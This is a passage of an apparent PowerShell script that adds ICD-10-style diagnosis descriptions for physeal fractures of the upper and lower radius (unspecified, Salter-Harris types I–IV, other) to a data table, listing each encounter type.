subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of radius, left arm","Unspecified physeal fracture of upper end of radius, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of radius, left arm","Unspecified physeal fracture of upper end of radius, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of radius, left arm","Unspecified physeal fracture of upper end of radius, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of radius, left arm","Unspecified physeal fracture of upper end of radius, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of radius, unspecified arm","Unspecified physeal fracture of upper end of radius, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of radius, unspecified arm","Unspecified physeal fracture of upper end of radius, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of radius, unspecified arm","Unspecified physeal fracture of upper end of radius, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of radius, unspecified arm","Unspecified physeal fracture of upper end of radius, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of radius, unspecified arm","Unspecified physeal fracture of upper end of radius, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of upper end of radius, unspecified arm","Unspecified physeal fracture of upper end of radius, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of radius, right arm","Salter-Harris Type I physeal fracture of upper end of radius, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of radius, right arm","Salter-Harris Type I physeal fracture of upper end of radius, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of radius, right arm","Salter-Harris Type I physeal fracture of upper end of radius, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of radius, right arm","Salter-Harris Type I physeal fracture of upper end of radius, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of radius, right arm","Salter-Harris Type I physeal fracture of upper end of radius, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of radius, right arm","Salter-Harris Type I physeal fracture of upper end of radius, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of radius, left arm","Salter-Harris Type I physeal fracture of upper end of radius, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of radius, left arm","Salter-Harris Type I physeal fracture of upper end of radius, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of radius, left arm","Salter-Harris Type I physeal fracture of upper end of radius, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of radius, left arm","Salter-Harris Type I physeal fracture of upper end of radius, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of radius, left arm","Salter-Harris Type I physeal fracture of upper end of radius, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of radius, left arm","Salter-Harris Type I physeal fracture of upper end of radius, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of radius, unspecified arm","Salter-Harris Type I physeal fracture of upper end of radius, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of radius, unspecified arm","Salter-Harris Type I physeal fracture of upper end of radius, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of radius, unspecified arm","Salter-Harris Type I physeal fracture of upper end of radius, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of radius, unspecified arm","Salter-Harris Type I physeal fracture of upper end of radius, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of radius, unspecified arm","Salter-Harris Type I physeal fracture of upper end of radius, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of upper end of radius, unspecified arm","Salter-Harris Type I physeal fracture of upper end of radius, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of radius, right arm","Salter-Harris Type II physeal fracture of upper end of radius, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of radius, right arm","Salter-Harris Type II physeal fracture of upper end of radius, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of radius, right arm","Salter-Harris Type II physeal fracture of upper end of radius, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of radius, right arm","Salter-Harris Type II physeal fracture of upper end of radius, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of radius, right arm","Salter-Harris Type II physeal fracture of upper end of radius, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of radius, right arm","Salter-Harris Type II physeal fracture of upper end of radius, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of radius, left arm","Salter-Harris Type II physeal fracture of upper end of radius, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of radius, left arm","Salter-Harris Type II physeal fracture of upper end of radius, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of radius, left arm","Salter-Harris Type II physeal fracture of upper end of radius, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of radius, left arm","Salter-Harris Type II physeal fracture of upper end of radius, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of radius, left arm","Salter-Harris Type II physeal fracture of upper end of radius, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of radius, left arm","Salter-Harris Type II physeal fracture of upper end of radius, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of radius, unspecified arm","Salter-Harris Type II physeal fracture of upper end of radius, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of radius, unspecified arm","Salter-Harris Type II physeal fracture of upper end of radius, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of radius, unspecified arm","Salter-Harris Type II physeal fracture of upper end of radius, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of radius, unspecified arm","Salter-Harris Type II physeal fracture of upper end of radius, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of radius, unspecified arm","Salter-Harris Type II physeal fracture of upper end of radius, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of upper end of radius, unspecified arm","Salter-Harris Type II physeal fracture of upper end of radius, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of radius, right arm","Salter-Harris Type III physeal fracture of upper end of radius, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of radius, right arm","Salter-Harris Type III physeal fracture of upper end of radius, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of radius, right arm","Salter-Harris Type III physeal fracture of upper end of radius, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of radius, right arm","Salter-Harris Type III physeal fracture of upper end of radius, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of radius, right arm","Salter-Harris Type III physeal fracture of upper end of radius, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of radius, right arm","Salter-Harris Type III physeal fracture of upper end of radius, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of radius, left arm","Salter-Harris Type III physeal fracture of upper end of radius, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of radius, left arm","Salter-Harris Type III physeal fracture of upper end of radius, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of radius, left arm","Salter-Harris Type III physeal fracture of upper end of radius, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of radius, left arm","Salter-Harris Type III physeal fracture of upper end of radius, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of radius, left arm","Salter-Harris Type III physeal fracture of upper end of radius, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of radius, left arm","Salter-Harris Type III physeal fracture of upper end of radius, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of radius, unspecified arm","Salter-Harris Type III physeal fracture of upper end of radius, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of radius, unspecified arm","Salter-Harris Type III physeal fracture of upper end of radius, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of radius, unspecified arm","Salter-Harris Type III physeal fracture of upper end of radius, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of radius, unspecified arm","Salter-Harris Type III physeal fracture of upper end of radius, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of radius, unspecified arm","Salter-Harris Type III physeal fracture of upper end of radius, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of upper end of radius, unspecified arm","Salter-Harris Type III physeal fracture of upper end of radius, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of radius, right arm","Salter-Harris Type IV physeal fracture of upper end of radius, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of radius, right arm","Salter-Harris Type IV physeal fracture of upper end of radius, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of radius, right arm","Salter-Harris Type IV physeal fracture of upper end of radius, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of radius, right arm","Salter-Harris Type IV physeal fracture of upper end of radius, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of radius, right arm","Salter-Harris Type IV physeal fracture of upper end of radius, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of radius, right arm","Salter-Harris Type IV physeal fracture of upper end of radius, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of radius, left arm","Salter-Harris Type IV physeal fracture of upper end of radius, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of radius, left arm","Salter-Harris Type IV physeal fracture of upper end of radius, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of radius, left arm","Salter-Harris Type IV physeal fracture of upper end of radius, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of radius, left arm","Salter-Harris Type IV physeal fracture of upper end of radius, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of radius, left arm","Salter-Harris Type IV physeal fracture of upper end of radius, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of radius, left arm","Salter-Harris Type IV physeal fracture of upper end of radius, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of radius, unspecified arm","Salter-Harris Type IV physeal fracture of upper end of radius, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of radius, unspecified arm","Salter-Harris Type IV physeal fracture of upper end of radius, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of radius, unspecified arm","Salter-Harris Type IV physeal fracture of upper end of radius, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of radius, unspecified arm","Salter-Harris Type IV physeal fracture of upper end of radius, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of radius, unspecified arm","Salter-Harris Type IV physeal fracture of upper end of radius, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of upper end of radius, unspecified arm","Salter-Harris Type IV physeal fracture of upper end of radius, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of radius, right arm","Other physeal fracture of upper end of radius, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of radius, right arm","Other physeal fracture of upper end of radius, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of radius, right arm","Other physeal fracture of upper end of radius, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of radius, right arm","Other physeal fracture of upper end of radius, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of radius, right arm","Other physeal fracture of upper end of radius, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of radius, right arm","Other physeal fracture of upper end of radius, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of radius, left arm","Other physeal fracture of upper end of radius, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of radius, left arm","Other physeal fracture of upper end of radius, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of radius, left arm","Other physeal fracture of upper end of radius, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of radius, left arm","Other physeal fracture of upper end of radius, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of radius, left arm","Other physeal fracture of upper end of radius, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of radius, left arm","Other physeal fracture of upper end of radius, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of radius, unspecified arm","Other physeal fracture of upper end of radius, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of radius, unspecified arm","Other physeal fracture of upper end of radius, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of radius, unspecified arm","Other physeal fracture of upper end of radius, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of radius, unspecified arm","Other physeal fracture of upper end of radius, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of radius, unspecified arm","Other physeal fracture of upper end of radius, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of upper end of radius, unspecified arm","Other physeal fracture of upper end of radius, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of radius, right arm","Unspecified physeal fracture of lower end of radius, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of radius, right arm","Unspecified physeal fracture of lower end of radius, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of radius, right arm","Unspecified physeal fracture of lower end of radius, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of radius, right arm","Unspecified physeal fracture of lower end of radius, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of radius, right arm","Unspecified physeal fracture of lower end of radius, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of radius, right arm","Unspecified physeal fracture of lower end of radius, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of radius, left arm","Unspecified physeal fracture of lower end of radius, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of radius, left arm","Unspecified physeal fracture of lower end of radius, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of radius, left arm","Unspecified physeal fracture of lower end of radius, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of radius, left arm","Unspecified physeal fracture of lower end of radius, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of radius, left arm","Unspecified physeal fracture of lower end of radius, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of radius, left arm","Unspecified physeal fracture of lower end of radius, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of radius, unspecified arm","Unspecified physeal fracture of lower end of radius, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of radius, unspecified arm","Unspecified physeal fracture of lower end of radius, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of radius, unspecified arm","Unspecified physeal fracture of lower end of radius, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of radius, unspecified arm","Unspecified physeal fracture of lower end of radius, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of radius, unspecified arm","Unspecified physeal fracture of lower end of radius, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of lower end of radius, unspecified arm","Unspecified physeal fracture of lower end of radius, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of radius, right arm","Salter-Harris Type I physeal fracture of lower end of radius, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of radius, right arm","Salter-Harris Type I physeal fracture of lower end of radius, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of radius, right arm","Salter-Harris Type I physeal fracture of lower end of radius, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of radius, right arm","Salter-Harris Type I physeal fracture of lower end of radius, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of radius, right arm","Salter-Harris Type I physeal fracture of lower end of radius, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of radius, right arm","Salter-Harris Type I physeal fracture of lower end of radius, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of radius, left arm","Salter-Harris Type I physeal fracture of lower end of radius, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of radius, left arm","Salter-Harris Type I physeal fracture of lower end of radius, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of radius, left arm","Salter-Harris Type I physeal fracture of lower end of radius, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of radius, left arm","Salter-Harris Type I physeal fracture of lower end of radius, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of radius, left arm","Salter-Harris Type I physeal fracture of lower end of radius, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of radius, left arm","Salter-Harris Type I physeal fracture of lower end of radius, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of radius, unspecified arm","Salter-Harris Type I physeal fracture of lower end of radius, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of radius, unspecified arm","Salter-Harris Type I physeal fracture of lower end of radius, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of radius, unspecified arm","Salter-Harris Type I physeal fracture of lower end of radius, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of radius, unspecified arm","Salter-Harris Type I physeal fracture of lower end of radius, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of radius, unspecified arm","Salter-Harris Type I physeal fracture of lower end of radius, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of lower end of radius, unspecified arm","Salter-Harris Type I physeal fracture of lower end of radius, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of radius, right arm","Salter-Harris Type II physeal fracture of lower end of radius, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of radius, right arm","Salter-Harris Type II physeal fracture of lower end of radius, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of radius, right arm","Salter-Harris Type II physeal fracture of lower end of radius, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of radius, right arm","Salter-Harris Type II physeal fracture of lower end of radius, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of radius, right arm","Salter-Harris Type II physeal fracture of lower end of radius, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of radius, right arm","Salter-Harris Type II physeal fracture of lower end of radius, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of radius, left arm","Salter-Harris Type II physeal fracture of lower end of radius, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of radius, left arm","Salter-Harris Type II physeal fracture of lower end of radius, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of radius, left arm","Salter-Harris Type II physeal fracture of lower end of radius, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of radius, left arm","Salter-Harris Type II physeal fracture of lower end of radius, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of radius, left arm","Salter-Harris Type II physeal fracture of lower end of radius, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of radius, left arm","Salter-Harris Type II physeal fracture of lower end of radius, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of radius, unspecified arm","Salter-Harris Type II physeal fracture of lower end of radius, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of radius, unspecified arm","Salter-Harris Type II physeal fracture of lower end of radius, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of radius, unspecified arm","Salter-Harris Type II physeal fracture of lower end of radius, unspecified arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of radius, unspecified arm","Salter-Harris Type II physeal fracture of lower end of radius, unspecified arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of radius, unspecified arm","Salter-Harris Type II physeal fracture of lower end of radius, unspecified arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of lower end of radius, unspecified arm","Salter-Harris Type II physeal fracture of lower end of radius, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of radius, right arm","Salter-Harris Type III physeal fracture of lower end of radius, right arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of radius, right arm","Salter-Harris Type III physeal fracture of lower end of radius, right arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of radius, right arm","Salter-Harris Type III physeal fracture of lower end of radius, right arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of radius, right arm","Salter-Harris Type III physeal fracture of lower end of radius, right arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of radius, right arm","Salter-Harris Type III physeal fracture of lower end of radius, right arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of radius, right arm","Salter-Harris Type III physeal fracture of lower end of radius, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of radius, left arm","Salter-Harris Type III physeal fracture of lower end of radius, left arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of radius, left arm","Salter-Harris Type III physeal fracture of lower end of radius, left arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of radius, left arm","Salter-Harris Type III physeal fracture of lower end of radius, left arm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of radius, left arm","Salter-Harris Type III physeal fracture of lower end of radius, left arm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of radius, left arm","Salter-Harris Type III physeal fracture of lower end of radius, left arm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of radius, left arm","Salter-Harris Type III physeal fracture of lower end of radius, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of radius, unspecified arm","Salter-Harris Type III physeal fracture of lower end of radius, unspecified arm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of radius, unspecified arm","Salter-Harris Type III physeal fracture of lower end of radius, unspecified arm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of lower end of radius, unspecified arm","Salter-Harris 